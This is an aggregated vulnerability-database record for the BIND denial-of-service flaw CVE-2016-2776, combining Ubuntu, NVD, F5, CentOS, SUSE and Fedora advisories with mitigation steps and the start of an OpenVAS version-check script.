ID: USN-3088-1
Type: ubuntu
Reporter: Ubuntu
Modified: 2016-09-27T00:00:00
Description
It was discovered that BIND incorrectly handled building responses to
certain specially crafted requests. A remote attacker could possibly use
this issue to cause BIND to crash, resulting in a denial of service.
{"cve": [{"lastseen": "2021-02-02T06:28:05", "description": "buffer.c in named in ISC BIND 9 before 9.9.9-P3, 9.10.x before 9.10.4-P3, and 9.11.x before 9.11.0rc3 does not properly construct responses, which allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-09-28T10:59:00", "title": "CVE-2016-2776", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2776"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:solaris:10.0", "cpe:/a:isc:bind:9.11.0", "cpe:/o:oracle:vm_server:3.4", "cpe:/o:oracle:vm_server:3.3", "cpe:/a:isc:bind:9.10.1", "cpe:/o:oracle:vm_server:3.2", "cpe:/a:isc:bind:9.10.2", "cpe:/a:isc:bind:9.10.4", "cpe:/o:hp:hp-ux:11.31", "cpe:/a:isc:bind:9.10.0", "cpe:/o:oracle:linux:7", "cpe:/o:oracle:linux:5.0", "cpe:/a:isc:bind:9.9.9", "cpe:/a:isc:bind:9.10.3", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2016-2776", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2776", "cvss": {"score": 7.8, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:isc:bind:9.10.3:p1:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:b1:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.31:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:p4:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:p4:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:b2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.4:p3:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:p3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:p3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:rc1:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:p1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.4:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:b2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:a1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:a1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:p2:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:p1:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.9.9:p3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:b2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:a2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:b3:*:*:*:*:*:*", 
"cpe:2.3:a:isc:bind:9.11.0:a3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:p1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:a2:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-06-28T14:42:33", "bulletinFamily": "software", "cvelist": ["CVE-2016-2776"], "description": "\nF5 Product Development has assigned ID 616864 (BIG-IP), ID 617867 (BIG-IQ and iWorkflow), and ID 617869 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H618448 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP AAM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP AFM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP Analytics| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP APM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP ASM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP DNS| 12.0.0 - 12.1.1| 13.0.0 \n12.1.2| High| BIND \nBIG-IP Edge Gateway| 11.2.1 \n10.2.1 - 10.2.4| None| High| BIND \nBIG-IP GTM| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP Link 
Controller| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP PEM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP PSM| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| None| High| BIND \nBIG-IP WebAccelerator| 11.2.1 \n10.2.1 - 10.2.4| None| High| BIND \nBIG-IP WOM| 11.2.1 \n10.2.1 - 10.2.4| None| High| BIND \nBIG-IP WebSafe| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| 13.0.0 \n12.1.2 \n11.6.1 HF2| High \n\n| BIND \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.1.1| None| Low| BIND \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| BIND \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| BIND \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| BIND \nBIG-IQ ADC| 4.5.0| None| Low| BIND \nBIG-IQ Centralized Management| 5.1.0 \n4.6.0| None| Low| BIND \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| BIND \nF5 iWorkflow| 2.0.0| None| Low| BIND \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nBIG-IP\n\nTo mitigate this vulnerability, you can use the DNS Caching and DNS Express features instead of BIND. 
In addition, to mitigate the issue on the management IP address, restrict access to that IP address to trusted hosts only.\n\nTo mitigate the issue on the self IP address, do not allow port 53 on the self IP address. If your self IP address is configured to use the default allow, you can remove that port from the list of the default allowed services.\n\nEnsuring that TCP/UDP port 53 is not allowed as a default service (allow-service default)\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. List the default services allowed by the **allow-service default **setting, by typing the following command: \n\nlist net self-allow\n\nThe command output appears similar to the following example:\n\nnet self-allow { \ndefaults { \nospf:any \ntcp:domain \ntcp:f5-iquery \ntcp:https \ntcp:snmp \ntcp:ssh \nudp:520 \nudp:cap \nudp:domain \nudp:f5-iquery \nudp:snmp \n} \n}\n\n 3. If TCP port 53 (tcp:53 or tcp:domain) or UDP port 53 (udp:53 or udp:domain) are listed as a default allowed port, you should delete the entries by typing the following command: \n\nmodify net self-allow defaults delete { tcp:domain udp:domain }\n\n 4. Save the configuration by typing the following command: \n\nsave sys config\n\nDisabling the Use BIND Server on BIG-IP option on the DNS profile\n\nTo mitigate the issue on the DNS profile, you can disable the **Use BIND Server on BIG-IP** option by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** Delivery** > **Profiles **> **DNS** or **Local Traffic** >** Profiles** >** Services** > **DNS**.\n 3. Select the applicable DNS profile.\n 4. From the **Use BIND Server on BIG-IP** option, select **Disabled.**\n 5. 
Click **Finished**.\n\n**Important:** Disabling the BIND server can impact DNS configurations that use BIND as a fallback method (return to DNS) for resolution.\n\nBIG-IP GTM/Link Controller\n\nVerifying whether you have configured any listener addresses to share a self IP (BIG-IP GTM/Link Controller)\n\nListener addresses that share a self IP address will expose the system to this vulnerability. To verify whether you have configured a listener address to share a self IP, run the following commands:\n\n * tmsh list /net self address\n * tmsh list /gtm listener address\n\nIf you have configured a listener address to share a self IP, you should reconfigure the address to use a unique IP address.\n\nChoosing a load balancing method other than Return to DNS for the GTM pool (BIG-IP GTM)\n\n**Important**: If DNS Express is not configured, BIG-IP GTM or Link Controller systems will respond to **A**, **AAAA**, and **CNAME** type DNS record queries only. Queries for other types of records, such as **NS** or **MX**, will fail. \n\nTo mitigate the issue on the GTM pool, you can use a load balancing method other than **Return to DNS** by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** GSLB **>** Pools.**\n 3. From the **Pool List **menu, select the applicable name.\n 4. Click the **Members** tab.\n 5. Choose a load balancing method other than **Return to DNS**.\n 6. 
Click **Update**.\n\nBIG-IQ, Enterprise Manager, or iWorkflow systems\n\nTo mitigate this vulnerability for the BIG-IQ system, the Enterprise Manager system, or the iWorkflow system, you should not configure any of these systems to function as a DNS server.\n\n**Impact of action:** Performing the suggested mitigation should not have a negative impact on your system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K17329: BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>)\n", "edition": 1, "modified": "2018-02-06T01:01:00", "published": "2016-09-27T21:51:00", "id": "F5:K18829561", "href": "https://support.f5.com/csp/article/K18829561", "title": "BIND vulnerability CVE-2016-2776", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2016-09-29T21:23:19", "bulletinFamily": "software", "cvelist": ["CVE-2016-2776"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. 
For more information, refer to SOL21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems.\n\nMitigation\n\nBIG-IP\n\nTo mitigate this vulnerability, you can use the DNS Caching and DNS Express features instead of BIND. In addition, to mitigate the issue on the management IP address, restrict access to that IP address to trusted hosts only.\n\nTo mitigate the issue on the self IP address, do not allow port 53 on the self IP address. If your self IP address is configured to use the default allow, you can remove that port from the list of the default allowed services.\n\n**_Ensuring that TCP/UDP port 53 is not allowed as a default service (allow-service default)_**\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. List the default services allowed by the **allow-service default **setting, by typing the following command: \n\nlist net self-allow\n\nThe command output appears similar to the following example:\n\nnet self-allow { \ndefaults { \nospf:any \ntcp:domain \ntcp:f5-iquery \ntcp:https \ntcp:snmp \ntcp:ssh \nudp:520 \nudp:cap \nudp:domain \nudp:f5-iquery \nudp:snmp \n} \n}\n\n 3. If TCP port 53 (tcp:53 or tcp:domain) or UDP port 53 (udp:53 or udp:domain) are listed as a default allowed port, you should delete the entries by typing the following command: \n\nmodify net self-allow defaults delete { tcp:domain udp:domain }\n\n 4. Save the configuration by typing the following command: \n\nsave sys config\n\nDisabling the Use BIND Server on BIG-IP option on the DNS profile\n\nTo mitigate the issue on the DNS profile, you can disable the **Use BIND Server on BIG-IP** option by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** Delivery** > **Profiles **> **DNS** or **Local Traffic** >** Profiles** >** Services** > **DNS.**\n 3. Select the applicable DNS profile.\n 4. From the **Use BIND Server on BIG-IP** option, select **Disabled.**\n 5. 
Click **Finished**.\n**Important:** Disabling the BIND server can impact DNS configurations that use BIND as a fallback method (return to DNS) for resolution.\n\nBIG-IP GTM/Link Controller\n\nVerifying whether you have configured any listener addresses to share a self IP (BIG-IP GTM/Link Controller) \n \nListener addresses that share a self IP address will expose the system to this vulnerability. To verify whether you have configured a listener address to share a self IP, run the following commands:\n\n * tmsh list /net self address\n * tmsh list /gtm listener address\n\nIf you have configured a listener address to share a self IP, you should reconfigure the address to use a unique IP address.\n\nChoosing a load balancing method other than Return to DNS for the GTM pool (BIG-IP GTM)\n\n**Important**: If DNS Express is not configured, BIG-IP GTM or Link Controller systems will respond to **A**, **AAAA**, and **CNAME** type DNS record queries only. Queries for other types of records, such as **NS** or **MX**, will fail. \n \nTo mitigate the issue on the GTM pool, you can use a load balancing method other than **Return to DNS** by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** GSLB **>** Pools.**\n 3. From the **Pool List **menu, select the applicable name.\n 4. Click the **Members** tab.\n 5. Choose a load balancing method other than **Return to DNS**.\n 6. 
Click **Update**.\n\n \nBIG-IQ, Enterprise Manager or iWorkflow systems\n\nTo mitigate this vulnerability for the BIG-IQ system, the Enterprise Manager system, or the F5 iWorkflow system, you should not configure any of these systems to function as a DNS server.\n\n**Impact of action:** Performing the suggested mitigation should not have a negative impact on your system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL17329: BIG-IP GTM name has changed to BIG-IP DNS\n", "modified": "2016-09-29T00:00:00", "published": "2016-09-27T00:00:00", "id": "SOL18829561", "href": "http://support.f5.com/kb/en-us/solutions/public/k/18/sol18829561.html", "type": "f5", "title": "SOL18829561 - BIND vulnerability CVE-2016-2776", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-12-20T18:26:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "**CentOS Errata and Security Advisory** CESA-2016:1945\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name\nSystem (DNS) protocols. BIND includes a DNS server (named); a resolver library\n(routines for applications to use when interfacing with DNS); and tools for\nverifying that the DNS server is operating correctly.\n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND constructed a response to a\nquery that met certain criteria. A remote attacker could use this flaw to make\nnamed exit unexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. 
(CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/034131.html\n\n**Affected packages:**\nbind97\nbind97-chroot\nbind97-devel\nbind97-libs\nbind97-utils\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1945.html", "edition": 3, "modified": "2016-09-28T14:01:06", "published": "2016-09-28T14:01:06", "href": "http://lists.centos.org/pipermail/centos-announce/2016-September/034131.html", "id": "CESA-2016:1945", "title": "bind97 security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:25:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "**CentOS Errata and Security Advisory** CESA-2016:1944\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name\nSystem (DNS) protocols. BIND includes a DNS server (named); a resolver library\n(routines for applications to use when interfacing with DNS); and tools for\nverifying that the DNS server is operating correctly.\n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND constructed a response to a\nquery that met certain criteria. A remote attacker could use this flaw to make\nnamed exit unexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. 
(CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/034130.html\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/034132.html\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/034135.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-libs-lite\nbind-license\nbind-lite-devel\nbind-pkcs11\nbind-pkcs11-devel\nbind-pkcs11-libs\nbind-pkcs11-utils\nbind-sdb\nbind-sdb-chroot\nbind-utils\ncaching-nameserver\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1944.html", "edition": 3, "modified": "2016-09-28T14:48:21", "published": "2016-09-28T14:00:32", "href": "http://lists.centos.org/pipermail/centos-announce/2016-September/034130.html", "id": "CESA-2016:1944", "title": "bind, caching security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-27T20:38:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The nameserver bind was updated to fix a remote denial of service\n vulnerability, where a crafted packet could cause the nameserver to abort.\n (CVE-2016-2776, bsc#1000362)\n\n", "edition": 1, "modified": "2016-09-27T21:10:06", "published": "2016-09-27T21:10:06", "id": "SUSE-SU-2016:2399-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00026.html", "type": "suse", "title": "Security update for bind (critical)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-27T20:38:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The nameserver bind was updated to fix a remote denial of service\n vulnerability, where a crafted packet could cause the nameserver to abort.\n (CVE-2016-2776, bsc#1000362)\n\n", "edition": 1, "modified": "2016-09-27T21:10:55", "published": 
"2016-09-27T21:10:55", "id": "SUSE-SU-2016:2401-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00027.html", "type": "suse", "title": "Security update for bind (critical)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-28T10:13:03", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The nameserver bind was updated to fix a remote denial of service\n vulnerability, where a crafted packet could cause the nameserver to abort.\n (CVE-2016-2776, bsc#1000362)\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\n\n", "edition": 1, "modified": "2016-09-28T11:09:52", "published": "2016-09-28T11:09:52", "id": "OPENSUSE-SU-2016:2406-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00030.html", "type": "suse", "title": "Security update for bind (critical)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-27T20:38:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The nameserver bind was updated to fix a remote denial of service\n vulnerability, where a crafted packet could cause the nameserver to abort.\n (CVE-2016-2776, bsc#1000362)\n\n", "edition": 1, "modified": "2016-09-27T22:09:45", "published": "2016-09-27T22:09:45", "id": "SUSE-SU-2016:2405-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00029.html", "type": "suse", "title": "Security update for bind (critical)", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. 
", "modified": "2016-10-01T00:53:36", "published": "2016-10-01T00:53:36", "id": "FEDORA:DBB0760600CD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: bind-9.10.4-2.P3.fc24", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. This package set contains only export version of BIND libraries, that are used for building ISC DHCP. ", "modified": "2016-10-03T17:23:31", "published": "2016-10-03T17:23:31", "id": "FEDORA:20D61604D0DA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: bind99-9.9.9-2.P3.fc24", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2016-10-24T23:52:28", "published": "2016-10-24T23:52:28", "id": "FEDORA:91B566078C1B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: bind-9.10.4-2.P3.fc23", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. This package set contains only export version of BIND libraries, that are used for building ISC DHCP. 
", "modified": "2016-10-09T03:15:53", "published": "2016-10-09T03:15:53", "id": "FEDORA:1BA44608799E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: bind99-9.9.9-2.P3.fc25", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. This package set contains only export version of BIND libraries, that are used for building ISC DHCP. ", "modified": "2016-10-24T23:52:20", "published": "2016-10-24T23:52:20", "id": "FEDORA:12A2D604E441", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: bind99-9.9.9-2.P3.fc23", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. 
", "modified": "2016-10-09T03:16:02", "published": "2016-10-09T03:16:02", "id": "FEDORA:22EA060879B9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: bind-9.10.4-2.P3.fc25", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2019-12-11T19:36:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "ISC BIND is prone to a denial of service vulnerability.", "modified": "2019-12-10T00:00:00", "published": "2016-09-28T00:00:00", "id": "OPENVAS:1361412562310106291", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106291", "type": "openvas", "title": "ISC BIND Denial of Service Vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# ISC BIND Denial of Service Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:isc:bind\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106291\");\n script_version(\"2019-12-10T15:03:15+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-10 15:03:15 +0000 (Tue, 10 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-09-28 09:42:23 +0700 (Wed, 28 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_cve_id(\"CVE-2016-2776\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"ISC BIND Denial of Service Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"bind_version.nasl\");\n script_mandatory_keys(\"isc/bind/detected\");\n\n script_tag(name:\"summary\", value:\"ISC BIND is prone to a denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 